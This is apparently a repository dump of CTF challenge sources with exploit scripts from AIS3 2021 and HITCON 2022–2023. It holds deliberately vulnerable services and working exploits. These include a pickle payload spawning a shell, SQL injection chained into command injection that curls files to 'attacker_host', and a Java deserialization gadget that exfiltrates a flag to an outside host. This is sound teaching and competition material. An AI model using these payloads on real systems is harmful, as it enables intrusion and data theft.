STOP 16 | ''' 17 | 18 | # `(0` -> push&pop -> NOP 19 | payload = ('AAAAAAAA' + 20 | '\x80\x04U\x02osU\x06system' + '(0' + # [BLOCK1] 21 | 'AAAAAAAAAAAAAAA' + 22 | '\x93U\x0dsh #AAAAAAAAA' + # [BLOCK2] 23 | 'AAAAAAAAAAAAAAA' + 24 | '\x85R.') # [BLOCK3] 25 | 26 | p.sendlineafter("Name: ", payload) 27 | p.sendlineafter("Choose: ", "V") 28 | evil_pkl = p.recvline().split(b": ")[1].decode() 29 | p.sendline() 30 | 31 | exploit = evil_pkl[32*4:32*5]+evil_pkl[32*6:32*7]+evil_pkl[32*8:] 32 | print("[+] exp:", exploit) 33 | 34 | p.sendlineafter("Choose: ", "L") 35 | p.sendlineafter("Saved Data: ", exploit) 36 | p.interactive() 37 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/README.md: -------------------------------------------------------------------------------- 1 | # Cat Slayer Fake | Nekogoroshi / Welcome (100pts) 2 | 3 | BGM: https://youtu.be/9-NusuQ8JaA 4 | 5 | `TERM=xterm-256color ssh -p 5566 h173@quiz.ais3.org` 6 | 7 | --- 8 | 9 | Author: splitline feat. 
Hojo Satoko 10 | 11 | > Hint 1: 12 | > For pwntools scripting, the simplest way to connect is just using the following script: 13 | > 14 | > ```python 15 | > process('TERM=xterm-256color ssh -p 5566 h173@quiz.ais3.org', shell=True, stdin=PTY) 16 | > ``` 17 | 18 | > Hint 2: 19 | > Tutorial Video: https://youtu.be/2b3Oqo13-r0?t=1296 20 | > 21 | > 另外,題目敘述中提及的指令適用於 Linux / Unix-Like 的 shell,若使用 Windows 系統則需要安裝虛擬機或是 WSL (Windows Subsystem for Linux)。 -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install ssh -qy 5 | RUN mkdir /run/sshd 6 | 7 | RUN adduser --disabled-password --gecos "" --shell /home/h173/lock.py h173 8 | RUN sed -i -re 's/^h173:[^:]+:/h173::/' /etc/passwd /etc/shadow 9 | RUN touch /home/h173/.hushlogin 10 | 11 | COPY ./ssh/sshd_config /etc/ssh/sshd_config 12 | COPY ./ssh/sshd /etc/pam.d/sshd 13 | 14 | CMD ["/usr/sbin/sshd", "-D"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cat-slayer-fake: 5 | build: ./ 6 | volumes: 7 | - ./lock.py:/home/h173/lock.py 8 | environment: 9 | - TERM=xterm-256color 10 | ports: 11 | - 5566:22/tcp 12 | - 7788:23/tcp -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-fake/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def conn(): 5 | return process('sshpass -p h173 ssh -p 19527 h173@splitline.tw', shell=True, stdin=PTY) 6 | 7 | 8 | p = conn() 9 | key = "" 10 | for idx in range(13): 11 | for try_key in range(10): 12 | p.send(str(try_key)) 13 | 
if p.recvuntil("LOCKED", timeout=2+idx*0.2) == b'': 14 | key += str(try_key) 15 | print("[KEY]", key) 16 | break 17 | else: 18 | p.close() 19 | p = conn() 20 | for k in key: 21 | p.send(k) 22 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | 6 | RUN useradd --no-create-home --home-dir / --shell /bin/false sandbox 7 | 8 | COPY ./share /game 9 | COPY ./xinetd /etc/xinetd.d/game 10 | COPY ./flag /secr3t_flag_meow_meow 11 | RUN chown -R root:root /game 12 | RUN chmod -R 700 /game 13 | RUN chmod 755 /game 14 | 15 | RUN chown sandbox:sandbox /game/sandbox.py 16 | RUN chmod 4755 /game/sandbox.py 17 | 18 | CMD ["/usr/sbin/xinetd","-dontfork"] -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cat-slayer-online: 3 | build: ./ 4 | ports: 5 | - "22222:22222" 6 | expose: 7 | - "22222" 8 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{CAO_Cat_Art_Online} -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/player.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/player.db -------------------------------------------------------------------------------- 
/ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/run.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Started by xinetd as root (see the xinetd config below). stderr is currently
# NOT redirected, so Python tracebacks from game.py are sent back to the client.
# exec 2>/dev/null
cd /game && ./game.py
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/share/sandbox.py:
--------------------------------------------------------------------------------
# Evaluates one untrusted "spell" inside a character-blacklist eval jail.
# Expected argv (supplied by game.py, not shown here):
#   argv[1] spell       - the expression to evaluate
#   argv[2] unlocked    - comma-separated indexes into `curses` that are allowed
#   argv[3] max_length  - int, length cap while not rebirthed
#   argv[4] rebirthed   - int flag; non-zero lifts the length cap and unblocks '".
import sys
import os
import string
if __name__ == '__main__':
    # Drop privileges before touching any attacker-controlled input.
    # NOTE(review): the Dockerfile marks this file 4755, but Linux ignores the
    # setuid bit on interpreted scripts; the only effective drop is this
    # setgroups/setgid/setuid sequence (gid first, so setuid cannot lock us out
    # of changing the gid), which works because xinetd starts the parent as root.
    os.setgroups([])
    os.setgid(1000)
    os.setuid(1000)
    os.umask(0o077)

    # A malformed unlocked index / non-numeric max_length or rebirthed value is
    # not caught here: int() raises ValueError and the process dies with a
    # traceback instead of printing the refusal message.
    spell = sys.argv[1].strip()
    unlocked = sys.argv[2].strip()
    unlocked = unlocked.split(",") if len(unlocked) != 0 else []
    max_length = int(sys.argv[3])
    rebirthed = int(sys.argv[4])

    # Non-ASCII input is rejected outright so the blacklist cannot be bypassed
    # with look-alike or normalised Unicode characters.
    try:
        spell.encode('ascii')
    except UnicodeEncodeError:
        print("YOU SHALL NOT PASS!")
        exit()

    # The length cap only applies before "rebirth".
    if not rebirthed and len(spell) > max_length:
        print("YOU SHALL NOT PASS!")
        exit()

    # Blacklist = a-z, 0-9 and ()'". minus the unlocked characters. int(i) may be
    # negative, which list indexing accepts (curses[-1] == '.'), so negative
    # indexes unlock from the end of the list; an out-of-range index raises.
    curses = list(string.ascii_lowercase+string.digits+"()'\".")
    blacklist = set(curses)
    for i in unlocked:
        blacklist -= set(curses[int(i)])
    if rebirthed:
        blacklist -= set("'\".")
    for char in spell:
        if char in blacklist:
            print("YOU SHALL NOT PASS!")
            exit()

    # Keep a private reference to eval, then strip exec/eval/__import__ from the
    # shared builtins module. eval() with an empty globals dict has CPython insert
    # that same (now stripped) builtins as __builtins__, so the spell cannot call
    # these three by name. Attribute access on literals and the remaining
    # builtins is still available - escaping through that is the challenge.
    _eval = __builtins__.eval
    del __builtins__.exec
    del __builtins__.eval
    del __builtins__.__import__
    print("[+] Casting Magic... ", _eval(spell, {}))
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Misc/cat-slayer-online/deploy/xinetd:
--------------------------------------------------------------------------------
service game
{
    disable = no
    type = UNLISTED
    wait = no
    # run.sh and game.py execute as root; only sandbox.py drops to uid/gid 1000.
    server = /game/run.sh
    socket_type = stream
    protocol = tcp
    user = root
    bind = 0.0.0.0
    port = 22222
    # At most 5 simultaneous connections per source IP and 3 s of CPU per
    # process, the only resource limits applied to player input.
    per_source = 5
    rlimit_cpu = 3
    nice = 18
    flags = REUSE
}
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Reverse/Peekora/README.md:
--------------------------------------------------------------------------------
# 🐰 Peekora 🥒 / Reverse (168pts)

吃太甜要配什麼

可樂

因為 too 甜配 cola

Usage: `python3 -m pickle flag_checker.pkl`

Author: splitline
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Reverse/README.md:
--------------------------------------------------------------------------------
# AIS3 2021 Pre-Exam [Reverse]

## 🐰 Peekora 🥒

- Category: Reverse
- Difficulty: Easy
- Solves: 75/327 (Pre-Exam), 0/190 (MyFirstCTF)
- Keywords: Pickle Bytecode

其實這題只是讀 bytecode 練習題而已,並告訴大家可以用 pickle 寫程式 —— 然而就算讀不懂(甚至不 disassemble 它),多少也有辦法通靈得出來。但其實除了硬讀以外,還有一些不用花苦力讀的有趣解法,可惜的是好像沒看到什麼人用 XD

### Solution 0x01

```
$ python3 -m pickletools -a flag_checker.pkl
```
然後硬讀,讀不懂的就爆破,沒了。

99% 的人都是這麼做的。

### Solution 0x02

簡單看過 bytecode 可以看出它先用 `input` 讀入輸入,再用 `__getitem__` 取出各個字元後用 `__eq__` 之類的東西逐一比對字元。

好,夠了,知道這些資訊就可以不用繼續讀了。

我們可以把 `__builtins__.input` 改成自己的 function,讓它吐回一個假的 str,其中那個假的 str 自訂了 `__eq__` 等方法的邏輯,讓 pickle 在用 `__eq__` 比對的同時,也順便幫你把正確的 flag 填回去,等 pickle load 完 flag 也出來了。詳情請見 [solve.py](Peekora/solve.py)。

### Solution 0x03

既然知道只要比對錯一個字元就會觸發
`exit`,那就可以透過這個特性 hook 住 `__builtins__.exit` 藉此爆破出所有字元了。 32 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/README.md: -------------------------------------------------------------------------------- 1 | # 【5/22 重要公告】 / Web (300pts) 2 | 3 | 為了防止系統不穩定的情形頻繁發生,我們(AIS3 MyFirstCTF、Pre-Exam 出題團隊)耗時九年研發了[一套服務](http://quiz.ais3.org:8001)來監控 Web 題目是否正常運作,歡迎參賽者使用,特此公告。 4 | 5 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | RUN apt update 4 | RUN apt install netcat-openbsd -qy 5 | RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini" 6 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | web-chals-monitor: 5 | build: ./ 6 | volumes: 7 | - ./src/:/var/www/html/ 8 | - ./flag:/flag_81c015863174cd0c14034cc60767c7f5 9 | ports: 10 | - 8001:80/tcp -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/flag: -------------------------------------------------------------------------------- 1 | AIS3{o1d_skew1_w3b_tr1cks_co11ect10n_:D} 2 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/challenges.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/challenges.db 
-------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/deploy/src/config.php: -------------------------------------------------------------------------------- 1 | querySingle("SELECT name, host, port FROM challenges WHERE id=${_GET['id']}", true); 9 | $host = str_replace(' ', '', $data['host']); 10 | $port = (int) $data['port']; 11 | $data['alive'] = strstr(shell_exec("timeout 1 nc -vz '$host' $port 2>&1"), "succeeded") !== FALSE; 12 | echo json_encode($data); 13 | } else { 14 | $json_resp = []; 15 | $query_res = $db->query("SELECT * FROM challenges"); 16 | while ($row = $query_res->fetchArray(SQLITE3_ASSOC)) $json_resp[] = $row; 17 | echo json_encode($json_resp); 18 | } 19 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/522-web-chals-monitor/poc.txt: -------------------------------------------------------------------------------- 1 | http://quiz.ais3.org:8001/ 2 | ?module=modules/api 3 | &id=0 union select 1,"';curl%09http://attacker_host/$(cat%09/*);'",3-- -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/README.md: -------------------------------------------------------------------------------- 1 | # Cat Slayer Inverse / Web (487pts) 2 | 3 | > 劇情請參見:**Cat Slayer | Cloud Edition** 及其前情提要 4 | 5 | 一開始也只是普通的和貓咪們玩而已不是嗎?吶,到底為什麼會變成這樣呢?我為什麼會被召喚到這個世界?我為什麼會在這裡?我為什麼會是一隻貓?我在做夢嗎?惡夢?真的好想、好想再和哥哥聊聊天啊⋯⋯從那天起哥哥就在放學時失蹤了,一直都沒能再見到他一面呢,說起來哥哥他啊,他總是—— 6 | 7 | 8 | 等等,哥哥是誰?想不起來啊,好像是很重要的人嗎⋯⋯不,一點都不重要,我現在只需要召喚更多貓貓🐱,不能停下來,還要更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多,更多的⋯⋯[召喚貓貓🐱](http://quiz.ais3.org:8787/maou/) 9 | 10 | Author: splitline feat. 
Cat Lucifer
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3"
services:
  Maou:
    image: tomcat
    ports:
      - 8787:8080
    volumes:
      - ./jstl-1.2.jar:/usr/local/tomcat/lib/jstl-1.2.jar
      - ./maou.war:/usr/local/tomcat/webapps/maou.war
      - ./flag:/____fl4g____
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/flag:
--------------------------------------------------------------------------------
AIS3{maou_lucifer_meowmeow}
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/jstl-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/jstl-1.2.jar
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/maou.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-pre-exam/2021/Web/cat-slayer-inverse/deploy/maou.war
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/Exploit.java:
--------------------------------------------------------------------------------
import com.cat.Maou;
import java.io.*;
import java.util.Base64;

/**
 * Serialises a crafted {@link Maou} (see Maou.java below) and prints the
 * payload base64-encoded, ready to be pasted into a URL parameter.
 */
public class Exploit {
    public static void main(String[] args) throws Exception {
        // The name passed here is irrelevant: Maou.writeObject ignores the fields.
        Maou m = new Maou("whatever");
        ByteArrayOutputStream ser = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(ser);
        out.writeObject(m);
        // '+' would be decoded as a space by a query-string parser, so it is
        // percent-encoded; '/' and '=' are left as-is.
        System.out.println(Base64.getEncoder().encodeToString(ser.toByteArray()).replace("+", "%2b"));
    }
}
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/com/cat/Cat.java:
--------------------------------------------------------------------------------
package com.cat;

import java.io.Serializable;

/** Abstract Cat type; presumably mirrors the target application's class (not referenced by Exploit directly). */
public abstract class Cat implements Serializable {
    public abstract String getName();
    public abstract void setName(String name);
    public abstract int getAttack();
    public abstract int getDefense();
}
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/com/cat/Maou.java:
--------------------------------------------------------------------------------
package com.cat;

import java.io.IOException;
import java.io.Serializable;
import java.util.ArrayList;

/**
 * Attacker-side stand-in for the target's com.cat.Maou. The field layout and
 * serialVersionUID presumably mirror the original (a UID mismatch would make the
 * target's ObjectInputStream reject the stream with InvalidClassException).
 * The custom writeObject below never calls defaultWriteObject(), so the bytes
 * on the wire are entirely hand-picked rather than derived from the fields.
 */
public class Maou implements Serializable {
    private static final long serialVersionUID = 2952304742572984796L;
    String[] DEMON_NAMES = { };
    String CAT_NAME_SETTER = "setName";
    String name = "(unnamed)";
    ArrayList cats = new ArrayList<>();

    public Maou(String name) {
        this.name = name;
    }

    private void writeObject(java.io.ObjectOutputStream stream) throws IOException {
        // The base64 blob decodes to `curl sq.pe:5000/$(cat /____fl4g____)`,
        // i.e. the flag (mounted at /____fl4g____ by docker-compose) is
        // exfiltrated to the attacker's host as part of the request path.
        // NOTE(review): the target's readObject is not in this listing; from the
        // values written ("exec", java.lang.Runtime) it presumably invokes the
        // method named by CAT_NAME_SETTER with DEMON_NAMES on each listed class -
        // confirm against the decompiled war before relying on this.
        String[] DEMON_NAMES = { "bash -c {echo,Y3VybCBzcS5wZTo1MDAwLyQoY2F0IC9fX19fZmw0Z19fX18p}|{base64,-d}|{bash,-i} " };
        stream.writeObject(DEMON_NAMES); // DEMON_NAMES
        stream.writeObject("exec"); // CAT_NAME_SETTER
        stream.writeObject("meowmeow...");

        // Only the cat class names need to be kept.
        ArrayList catsClass = new ArrayList<>();
        catsClass.add("java.lang.Runtime");
        stream.writeObject(catsClass);
    }
}

-------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/cat-slayer-inverse/exploit/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | javac Exploit.java && java Exploit -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/README.md: -------------------------------------------------------------------------------- 1 | # XSS Me / Web (452pts) 2 | 3 | I know how to alert(1) I am a hacker now 😎😎😎 4 | 5 | 笑死😂😂😂👍👍這你自己 alert(1) 的嗎😳😳很厲害欸😎😎 哈哈是我啦你是不是很懂駭客啊skrskr🤙🤙🤙😎😎😎👊👊👊🖕🖕🖕🖖🖖🖖 XSS 笑死😂😂😂👍👍這你自己 alert 出來的嗎😳😳很電神欸😎😎 6 | 7 | http://quiz.ais3.org:8003 8 | 9 | > admin 會在登入後訪問你所回報的網址,請試著偷到 admin 在 `http://quiz.ais3.org:8003/getflag` 頁面上的 flag 吧! 10 | > 11 | > 另外,此題有在 html header 中設定簡單的 `Content-Security-Policy`,可以參考:https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP 12 | 13 | Author: splitline -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.8 2 | RUN pip3 install redis rq -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/deploy/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install -f -y --no-install-recommends chromium chromium-driver redis-server 5 | RUN pip3 install selenium redis rq 6 | 7 | COPY xssbot.py /xssbot.py 8 | COPY run.sh /run.sh 9 | RUN chmod +x /run.sh 10 | RUN useradd 
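--no-create-home --home-dir / --shell /bin/false user

USER user
CMD /run.sh
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/xss-me/deploy/bot/run.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# protected-mode off: any container on the compose network can reach this redis.
redis-server --protected-mode no &
for _ in {1..4}; do
    rq worker &
done
sleep infinity
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/xss-me/deploy/bot/xssbot.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import time
import os

from selenium.webdriver import Chrome
from selenium.webdriver.chrome.options import Options
from selenium.common.exceptions import TimeoutException, WebDriverException

TIMEOUT = 3
HOSTNAME = "xss-me"

def browse(url_path):
    """Log in as admin and visit ``url_path`` on the challenge host, then quit Chrome.

    Runs inside an rq worker (see run.sh). ``url_path`` is the attacker-reported
    path and is interpolated into the URL as-is.

    Any exception (e.g. a TimeoutException from the page-load limit) propagates
    to the worker, but only after the browser has been shut down: the original
    code called ``chrome.quit()`` last, outside any ``finally``, so every timed
    out or failed visit leaked a headless Chrome process.
    """
    options = Options()
    options.headless = True
    options.add_argument('--no-sandbox')  # https://stackoverflow.com/a/45846909
    options.add_argument('--disable-dev-shm-usage')  # https://stackoverflow.com/a/50642913
    chrome = Chrome(options=options)
    try:
        # https://stackoverflow.com/a/47695227
        chrome.set_page_load_timeout(TIMEOUT)
        chrome.set_script_timeout(TIMEOUT)

        # login - the admin password is the PASSWORD env var shared via docker-compose
        chrome.get(f"http://{HOSTNAME}/")
        chrome.find_element_by_name('username').send_keys('admin')
        chrome.find_element_by_name('password').send_keys(os.getenv('PASSWORD'))
        chrome.find_element_by_tag_name('button').click()

        # visit the reported path with the admin session
        chrome.get(f"http://{HOSTNAME}/{url_path}")

        # give injected scripts time to run before the browser goes away
        time.sleep(TIMEOUT)
    finally:
        chrome.quit()
--------------------------------------------------------------------------------
/ais3-pre-exam/2021/Web/xss-me/deploy/docker-compose.yml:
--------------------------------------------------------------------------------
version: "3.4"

x-share-env: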
&share-env 4 | PASSWORD: 1sBS2dAg7eZUZDp58PGDRrnwYAzQd2HtWgnx9ySfW0M 5 | 6 | services: 7 | xss-me: 8 | depends_on: 9 | - xss-bot 10 | build: ./app 11 | volumes: 12 | - ./app/:/app 13 | ports: 14 | - 8003:80/tcp 15 | environment: 16 | <<: *share-env 17 | 18 | xss-bot: 19 | build: ./bot 20 | image: splitline/xssbot 21 | environment: 22 | <<: *share-env -------------------------------------------------------------------------------- /ais3-pre-exam/2021/Web/xss-me/poc.txt: -------------------------------------------------------------------------------- 1 | http://quiz.ais3.org:8003/ 2 | ?message= 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/app/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "express": "^4.18.2", 4 | "xfetch-js": "^0.5.0" 5 | }, 6 | "scripts": { 7 | "start": "node app.js" 8 | } 9 | } -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:17-alpine 2 | 3 | RUN apk update && apk upgrade 4 | RUN apk add chromium 5 | 6 | RUN mkdir /app 7 | WORKDIR /app 8 | COPY package.json yarn.lock /app/ 9 | RUN yarn 10 | 11 | COPY . . 
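ENTRYPOINT ["yarn", "start"]

--------------------------------------------------------------------------------
/hitcon-quals/2022/web/sdm/bot/app.js:
--------------------------------------------------------------------------------
const net = require('net')
const visit = require('./bot')
const dns = require('dns/promises')

const PORT = process.env.PORT || 7777
const REPORT_HOST = process.env.REPORT_HOST || 'localhost'

// Raw TCP endpoint through which the web app (REPORT_HOST, "chall" in
// docker-compose) hands a URL to the headless browser. Only that host may use it.
dns.lookup(REPORT_HOST).then(({ address }) => {
  // REPORT_HOST is resolved once at start-up; if the reporting container is
  // re-created with a different address this process has to be restarted.
  //
  // Node reports an IPv4 peer on a dual-stack listener as an IPv4-mapped IPv6
  // address ("::ffff:a.b.c.d"), so both spellings are accepted - but only as
  // exact matches. The previous `remoteAddress.endsWith(address)` test let any
  // peer whose textual address merely ended in the resolved one through.
  const allowed = new Set([address, `::ffff:${address}`])

  const server = net.createServer(async socket => {
    if (!allowed.has(socket.remoteAddress)) {
      socket.end('Bad reporting host')
      return
    }
    socket.on('data', async data => {
      try {
        // One URL per connection: acknowledge and close before the (slow)
        // browser visit so the reporter never waits on it.
        const url = data.toString().trim()
        socket.end('URL received')
        socket.destroy()

        // Scheme check only; everything after it is whatever was reported.
        if (!url.match(/^https?:\/\//)) {
          console.log(`[-] Invalid URL: ${url}`)
          return;
        }

        console.log(`[+] Received: ${url}`)
        await visit(url)
        console.log(`[+] Visited: ${url}`)
      } catch (e) {
        console.log(e)
      }
    })
  })
  server.listen(PORT, () => {
    console.log('Bot socket server listening on port', PORT)
  })
})
--------------------------------------------------------------------------------
/hitcon-quals/2022/web/sdm/bot/package.json:
--------------------------------------------------------------------------------
{
  "dependencies": {
    "puppeteer": "^19.3.0"
  },
  "scripts": {
    "start": "node app.js"
  }
}
--------------------------------------------------------------------------------
/hitcon-quals/2022/web/sdm/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.7'
services:
  bot:
    build:
      context: ./bot
    environment:
      - PORT=8080
      - SITE=https://sdm.chal.hitconctf.com/
      - REPORT_HOST=chall
      - FLAG=hitcon{yeeees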
all of these r intend3d s0luti0n (should be?)} 11 | chall: 12 | build: 13 | context: ./app 14 | environment: 15 | - HCAPTCHA_SECRET_KEY=0x0000000000000000000000000000000000000000 16 | - BOT_HOST=bot 17 | - BOT_PORT=8080 18 | - HTTPS=1 # unset to use http mode 19 | volumes: 20 | # https credentials (not included) 21 | - ./credentials:/opt/credentials 22 | ports: 23 | - "443:48763" 24 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/sdm/exp/index.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/exp/genhtml.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | git clone https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 4 | cd PHP_INCLUDE_TO_SHELL_CHAR_DICT && git apply ../test.py.diff 5 | python test.py 6 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/exp/parse.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | pdfimages -all mpdf.pdf ./ 4 | 5 | python -c 'from PIL import Image 6 | im = Image.open("-000.png") 7 | data=b"".join(map(lambda d: bytes(d)[::-1], im.getdata()))[4:].replace(b"\x00", b"") 8 | open("out.txt","wb").write(data)' 9 | 10 | rm -f -- *.pdf *png 11 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | RUN apt update && apt install -y \ 4 | libfreetype6-dev \ 5 | libjpeg62-turbo-dev \ 6 | libpng-dev \ 7 | git \ 8 | && docker-php-ext-configure gd --with-freetype --with-jpeg \ 9 | && docker-php-ext-install -j$(nproc) gd 10 | 11 | COPY --from=composer/composer /usr/bin/composer 
/usr/bin/composer 12 | RUN cd /var/www/ && composer require mpdf/mpdf 13 | RUN chmod -R 733 /var/www/vendor/mpdf/mpdf/tmp 14 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | 3 | services: 4 | web: 5 | build: . 6 | volumes: 7 | - ./src:/var/www/html/ 8 | ports: 9 | - "80:80/tcp" 10 | environment: 11 | - HCAPTCHA_SITE_KEY=10000000-ffff-ffff-ffff-000000000001 12 | - HCAPTCHA_SECRET_KEY=0x0000000000000000000000000000000000000000 13 | 14 | -------------------------------------------------------------------------------- /hitcon-quals/2022/web/web2pdf/service/src/hcaptcha.php: -------------------------------------------------------------------------------- 1 | [ 11 | 'method' => 'POST', 12 | 'header' => 'Content-Type: application/x-www-form-urlencoded', 13 | 'content' => http_build_query([ 14 | 'secret' => $_ENV['HCAPTCHA_SECRET_KEY'], 15 | 'response' => $_POST['h-captcha-response'] 16 | ]) 17 | ]])); 18 | $data = json_decode($data); 19 | return $data->success; 20 | } 21 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:dind 2 | 3 | COPY instancer /www 4 | COPY service /service 5 | WORKDIR /www 6 | 7 | RUN apk add --no-cache --update nodejs npm 8 | RUN npm install 9 | 10 | RUN chmod +x /www/docker-entrypoint.sh 11 | -------------------------------------------------------------------------------- /hitcon-quals/2023/misc-amf/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | instancer: 5 | build: . 
entrypoint: /www/docker-entrypoint.sh
ports:
  - "80:80"
# Required for the nested dockerd started by docker-entrypoint.sh. A privileged
# container effectively has host-level privileges, so the instancer itself is
# part of the trust boundary.
privileged: true
environment:
  - TITLE=AMF::Instancer
  - INSTANCER_HOST=sandbox.local
  - CHALL_BASE_HOST=.test.splitline.tw
  - SCOREBOARD_URL=http://35.201.208.240
  - AUTO_DESTROY=15 # minutes
--------------------------------------------------------------------------------
/hitcon-quals/2023/misc-amf/instancer/docker-entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Docker-in-Docker entrypoint: start a private dockerd, build the challenge
# image once, then run the Node instancer that spawns a container per request.
rm -f /var/run/docker.pid
dockerd &
# Fixed wait instead of polling the daemon socket: on a slow host the build
# below can race dockerd's start-up.
sleep 3s

# `==` inside [ ] is not POSIX; busybox sh (docker:dind base) presumably accepts
# it, dash would not - TODO confirm if the base image ever changes.
if [ "$(docker images -q service:latest 2> /dev/null)" == "" ]; then
    echo "[debug] docker build -t service:latest --build-arg AUTO_DESTROY=$AUTO_DESTROY /service"
    docker build -t service:latest --build-arg AUTO_DESTROY=$AUTO_DESTROY /service
fi

NODE_ENV=production /usr/bin/node app.js
--------------------------------------------------------------------------------
/hitcon-quals/2023/misc-amf/instancer/package.json:
--------------------------------------------------------------------------------
{
  "dependencies": {
    "body-parser": "^1.20.1",
    "express": "^4.18.2",
    "express-session": "^1.17.3",
